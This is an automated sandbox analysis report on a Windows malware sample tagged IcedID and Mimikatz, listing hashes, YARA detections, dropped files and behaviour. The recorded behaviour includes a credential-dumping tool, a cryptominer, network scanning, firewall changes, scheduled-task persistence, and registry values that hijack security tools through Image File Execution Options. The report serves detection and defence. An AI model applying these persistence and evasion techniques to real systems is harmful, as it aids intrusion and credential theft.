Analysis
-
max time kernel
150s
-
max time network
155s
-
platform
windows10-2004_x64
-
resource
win10v2004-20240508-en
-
resource tags
arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
-
submitted
28/05/2024, 10:27
Behavioral task
behavioral1
Sample
2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
-
Size
9.0MB
-
MD5
03d0de4cda4efd31f762aadf487b7aec
-
SHA1
aeb5d2ef2ba2ba6a24ece954442d236caaabf872
-
SHA256
6f1e9522dd1dee1eb3bcd140f3d4cd61ab3cf7bfd8fdaabb8d1dec4834be3713
-
SHA512
a40209a7f055317ece2ce295bd0dcc2b8c186f131f37e73fb93a02e4a87e733b9a82cc3b2c43968fa7e3d04ef7dc50e4d6c38262b20cd9c9c018186c1f1683c5
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description | pid | Process | procid_target
PID 2524 created 2140 | 2524 | ncnrnqz.exe | 38
-
Contacts a large (30386) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource | yara_rule
behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
-
UPX dump on OEP (original entry point) 43 IoCs
resource | yara_rule
behavioral2/memory/4740-0-0x0000000000400000-0x0000000000A9B000-memory.dmp | UPX
behavioral2/memory/4740-4-0x0000000000400000-0x0000000000A9B000-memory.dmp | UPX
behavioral2/files/0x00080000000235bb-6.dat | UPX
behavioral2/memory/4576-8-0x0000000000400000-0x0000000000A9B000-memory.dmp | UPX
behavioral2/files/0x00070000000235f9-134.dat | UPX
behavioral2/memory/3016-136-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp | UPX
behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp | UPX
behavioral2/files/0x0007000000023603-141.dat | UPX
behavioral2/memory/3340-142-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/3340-150-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/files/0x0007000000023602-163.dat | UPX
behavioral2/memory/4168-164-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/2416-171-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4156-175-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/2296-179-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4168-182-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/4256-184-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/3584-188-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4428-192-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4168-194-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/3064-197-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4168-200-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/4892-202-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/1056-206-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4532-210-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4168-212-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/3228-215-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4052-219-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4168-221-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/2704-224-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/3028-228-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4168-232-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/4260-234-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4776-236-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4728-238-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/6344-250-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4168-251-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/3324-253-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | UPX
behavioral2/memory/4168-254-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/4168-255-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/4168-257-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/4168-260-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
behavioral2/memory/4168-262-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | UPX
-
XMRig Miner payload 12 IoCs
resource | yara_rule
behavioral2/memory/4168-182-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-194-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-200-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-212-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-221-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-232-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-251-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-254-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-255-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-257-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-260-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
behavioral2/memory/4168-262-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | xmrig
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource | yara_rule
behavioral2/memory/4740-0-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/memory/4740-4-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/files/0x00080000000235bb-6.dat | mimikatz
behavioral2/memory/4576-8-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp | mimikatz
-
Drops file in Drivers directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | ncnrnqz.exe
File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
File created | C:\Windows\system32\drivers\etc\hosts | ncnrnqz.exe
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid | Process
2316 | netsh.exe
4128 | netsh.exe
-
Sets file execution options in registry 2 TTPs 40 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | ncnrnqz.exe
-
Executes dropped EXE 31 IoCs
pid | Process
4576 | ncnrnqz.exe
2524 | ncnrnqz.exe
3016 | wpcap.exe
1924 | illedyzmr.exe
3016 | vfshost.exe
3340 | mtlvznziz.exe
3792 | xohudmc.exe
2008 | yqiwma.exe
4168 | jrvvrz.exe
2416 | mtlvznziz.exe
4156 | mtlvznziz.exe
2296 | mtlvznziz.exe
4256 | mtlvznziz.exe
3584 | mtlvznziz.exe
4428 | mtlvznziz.exe
3064 | mtlvznziz.exe
4892 | mtlvznziz.exe
1056 | mtlvznziz.exe
4532 | mtlvznziz.exe
3228 | mtlvznziz.exe
4052 | mtlvznziz.exe
2704 | mtlvznziz.exe
3028 | mtlvznziz.exe
4620 | ncnrnqz.exe
4260 | mtlvznziz.exe
4776 | mtlvznziz.exe
4728 | mtlvznziz.exe
4052 | gepmrvmba.exe
6344 | mtlvznziz.exe
3324 | mtlvznziz.exe
6356 | ncnrnqz.exe
-
Loads dropped DLL 12 IoCs
pid | Process
3016 | wpcap.exe (9 identical entries)
1924 | illedyzmr.exe (3 identical entries)
-
resource | yara_rule
behavioral2/files/0x00070000000235f9-134.dat | upx
behavioral2/memory/3016-136-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp | upx
behavioral2/memory/3016-138-0x00007FF63A910000-0x00007FF63A9FE000-memory.dmp | upx
behavioral2/files/0x0007000000023603-141.dat | upx
behavioral2/memory/3340-142-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/3340-150-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/files/0x0007000000023602-163.dat | upx
behavioral2/memory/4168-164-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/2416-171-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4156-175-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/2296-179-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4168-182-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/4256-184-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/3584-188-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4428-192-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4168-194-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/3064-197-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4168-200-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/4892-202-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/1056-206-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4532-210-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4168-212-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/3228-215-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4052-219-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4168-221-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/2704-224-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/3028-228-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4168-232-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/4260-234-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4776-236-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4728-238-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/6344-250-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4168-251-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/3324-253-0x00007FF771380000-0x00007FF7713DB000-memory.dmp | upx
behavioral2/memory/4168-254-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/4168-255-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/4168-257-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/4168-260-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
behavioral2/memory/4168-262-0x00007FF702680000-0x00007FF7027A0000-memory.dmp | upx
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
79 | ifconfig.me
80 | ifconfig.me
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | ncnrnqz.exe
File created | C:\Windows\SysWOW64\pthreadVC.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\yqiwma.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | ncnrnqz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | ncnrnqz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | ncnrnqz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | ncnrnqz.exe
File created | C:\Windows\SysWOW64\Packet.dll | wpcap.exe
File created | C:\Windows\system32\wpcap.dll | wpcap.exe
File created | C:\Windows\system32\Packet.dll | wpcap.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 | ncnrnqz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 | ncnrnqz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | ncnrnqz.exe
File created | C:\Windows\SysWOW64\wpcap.dll | wpcap.exe
File created | C:\Windows\SysWOW64\yqiwma.exe | xohudmc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | ncnrnqz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | ncnrnqz.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | ncnrnqz.exe
-
Drops file in Program Files directory 3 IoCs
description | ioc | Process
File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
-
Drops file in Windows directory 60 IoCs
description | ioc | Process
File opened for modification | C:\Windows\kvialcmr\ncnrnqz.exe | 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\svschost.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\vimpcsvc.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\svschost.xml | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\schoedcl.xml | ncnrnqz.exe
File created | C:\Windows\kvialcmr\svschost.xml | ncnrnqz.exe
File opened for modification | C:\Windows\kvialcmr\docmicfg.xml | ncnrnqz.exe
File opened for modification | C:\Windows\kvialcmr\schoedcl.xml | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\rzvrtrlue\illedyzmr.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\ssleay32.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\rzvrtrlue\ip.txt | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\spoolsrv.xml | ncnrnqz.exe
File created | C:\Windows\kvialcmr\spoolsrv.xml | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\Corporate\mimilib.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\upbdrjv\swrpwe.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\tucl-1.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\vimpcsvc.xml | ncnrnqz.exe
File created | C:\Windows\ime\ncnrnqz.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\rzvrtrlue\wpcap.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\coli-0.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\libeay32.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\posh-0.dll | ncnrnqz.exe
File opened for modification | C:\Windows\ctvlnlili\rzvrtrlue\Result.txt | gepmrvmba.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\xdvl-0.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\svschost.xml | ncnrnqz.exe
File opened for modification | C:\Windows\kvialcmr\spoolsrv.xml | ncnrnqz.exe
File opened for modification | C:\Windows\kvialcmr\vimpcsvc.xml | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\rzvrtrlue\wpcap.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\spoolsrv.xml | ncnrnqz.exe
File opened for modification | C:\Windows\kvialcmr\svschost.xml | ncnrnqz.exe
File created | C:\Windows\kvialcmr\ncnrnqz.exe | 2024-05-28_03d0de4cda4efd31f762aadf487b7aec_hacktools_icedid_mimikatz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\cnli-1.dll | ncnrnqz.exe
File created | C:\Windows\kvialcmr\vimpcsvc.xml | ncnrnqz.exe
File opened for modification | C:\Windows\ctvlnlili\Corporate\log.txt | cmd.exe
File created | C:\Windows\kvialcmr\schoedcl.xml | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\Corporate\mimidrv.sys | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\rzvrtrlue\scan.bat | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\trch-1.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\ucl.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\spoolsrv.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\docmicfg.xml | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\docmicfg.xml | ncnrnqz.exe
File created | C:\Windows\kvialcmr\docmicfg.xml | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\rzvrtrlue\gepmrvmba.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\libxml2.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\zlib1.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\vimpcsvc.xml | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\rzvrtrlue\Packet.dll | ncnrnqz.exe
File opened for modification | C:\Windows\ctvlnlili\rzvrtrlue\Packet.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\crli-0.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\Corporate\vfshost.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\trfo-2.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\docmicfg.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\schoedcl.xml | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\Shellcode.ini | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\exma-1.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\tibe-2.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\specials\schoedcl.exe | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\AppCapture64.dll | ncnrnqz.exe
File created | C:\Windows\ctvlnlili\UnattendGC\AppCapture32.dll | ncnrnqz.exe
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
1540 | sc.exe
4352 | sc.exe
1924 | sc.exe
4700 | sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource | yara_rule
behavioral2/files/0x00080000000235bb-6.dat | nsis_installer_2
behavioral2/files/0x00080000000232ff-15.dat | nsis_installer_1
behavioral2/files/0x00080000000232ff-15.dat | nsis_installer_2
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4456 | schtasks.exe
3372 | schtasks.exe
3040 | schtasks.exe
-
Modifies data under HKEY_USERS 49 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | ncnrnqz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | mtlvznziz.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | mtlvznziz.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | ncnrnqz.exe
